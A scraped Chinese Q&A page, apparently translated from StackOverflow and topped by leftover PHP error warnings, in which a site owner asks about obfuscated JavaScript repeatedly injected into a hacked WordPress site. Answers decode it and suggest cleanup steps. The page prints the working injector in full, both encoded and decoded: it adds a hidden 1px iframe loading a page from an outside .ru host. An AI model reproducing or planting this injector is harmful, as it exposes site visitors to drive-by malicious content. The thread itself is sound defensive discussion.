Warning: file_get_contents(/data/phpspider/zhask/data//catemap/1/php/253.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Javascript 恶意js正在自动注入my header.php文件和许多其他js文件?_Javascript_Php_Jquery_Malware - Fatal编程技术网
Fatal编程技术网
  • javascript/
  • Javascript 恶意js正在自动注入my header.php文件和许多其他js文件?

Javascript 恶意js正在自动注入my header.php文件和许多其他js文件?

javascript php jquery

Javascript 恶意js正在自动注入my header.php文件和许多其他js文件?,javascript,php,jquery,malware,Javascript,Php,Jquery,Malware,目前我面临着一个地狱般的情况,我的四个客户网站在10天前被黑客入侵。我把它们弄得一团糟,其中三个(运行magento)在我与它们长期的混乱之后工作得很好,但其中一个(运行word press)仍然面临着同样的情况,我不知道发生了什么,经过一个特定的时间,js文件和一些php文件也自动注入了这种代码: <? #ded509# echo "<script type=\"text/javascript\" language=\"javascript\" > e=eval;v=\"0x

目前我面临着一个地狱般的情况,我的四个客户网站在10天前被黑客入侵。我把它们弄得一团糟,其中三个(运行magento)在我与它们长期的混乱之后工作得很好,但其中一个(运行word press)仍然面临着同样的情况,我不知道发生了什么,经过一个特定的时间,js文件和一些php文件也自动注入了这种代码:

<?
#ded509#
echo "<script type=\"text/javascript\" language=\"javascript\" > e=eval;v=\"0x\";a=0;try{a&=2}catch(q){a=1}if(!a){try{document[\"body\"]^=~1;}catch(q){a2=\"!\"}z=\"2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42\".split(a2);s=\"\";if(window.document)for(i=0;i<z.length;i++)     {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>";
#/ded509#
?>
这段代码被注入所有js文件和主文件中,我更改了ftp密码,检查了cron作业,手动查找任何php代码(我感觉有些php代码正在这样做),但我无法理解,是的,我尝试解码这段代码,并尝试获取这段代码的功能,然而,从我的js文件中删除这些恶意代码会使我的站点在一段时间内保持良好状态,但是在一段随机时间之后,脚本会自动注入这些代码吗?这个js代码实际上是什么?如果有人解释到底发生了什么,这将非常有帮助。

您必须将根目录文件或被反复黑客攻击的文件的权限更改为444。确保将所有index.php/html文件和.htaccess文件的权限更改为只读。另外,给js目录和文件一个555权限也会有所帮助

这是停止一次又一次垃圾邮件的快速解决方案。要找到这个问题的根源,您必须检查数据库条目中是否有常见的表单,如contact_us等,这些表单可能在没有适当的清理过滤器的情况下使用脚本。还要从根目录中删除任何未知文件。

PHP会响应此命令

<script type="text/javascript" language="javascript" > e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["body"]^=~1;}catch(q){a2="!"}z="2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42".split(a2);s="";if(window.document)for(i=0;i<z.length;i++)     {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>
它是一个自动执行的匿名函数。脚本在页面中创建一个iframe,并从
http://jakyskyf.ru/count16.php

如果您的服务器托管在共享服务器中,则管理员帐户本身可能已受损

你能做的事。

  • 检查服务器日志是最好的地方。检查一些恶意条目
  • 请与您的主机提供商联系
  • 将密码更改为强密码
  • 通常在wordpress网站上会发生这种事情(在我的很多wordpress网站上都发生过)。如果您正在使用wordpress更新到最新版本
  • 将管理员用户名从
    admin
    更改为其他名称
  • 更改您的管理员电子邮件和密码。黑客可能改变了它
这些链接将为您提供更多输入信息

站点是否托管在共享服务器中?可能是服务器本身受损,而不仅仅是您的域。请与托管提供商联系。文件权限当前为604,文件夹权限当前为705,是否仍需要更改?是,但不是所有文件夹。仅根目录下的裸文件、所有.htaccess文件、所有index.php和index.html文件以及js目录及其文件。通常,这些恶意脚本通过.htaccess和索引文件找到它们的路径。如果您尝试更改所有目录的权限,您的项目可能会停止工作。我如何才能摆脱它?回答更新了更多信息 
e = eval;

v = "0x";
a = 0;
try {
    a &= 2
} catch (q) {
    a = 1
}
if (!a) {
    try {
        document["body"] ^= ~1;
    } catch (q) {
        a2 = "!"
    }
    z = "2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42".split(a2);
    s = "";
    if (window.document) for (i = 0; i < z.length; i++) {
            s += String.fromCharCode(e(v + (z[i])) - 7);
    }
    zaz = s;
    e(zaz);
}

(function () {
    var c = document.createElement('iframe');

    c.src = 'http://jakyskyf.ru/count16.php';
    c.style.position = 'absolute';
    c.style.border = '0';
    c.style.height = '1px';
    c.style.width = '1px';
    c.style.left = '1px';
    c.style.top = '1px';

    if (!document.getElementById('c')) {
        document.write('<div id=\'c\'></div>');
        document.getElementById('c').appendChild(c);
    }
})();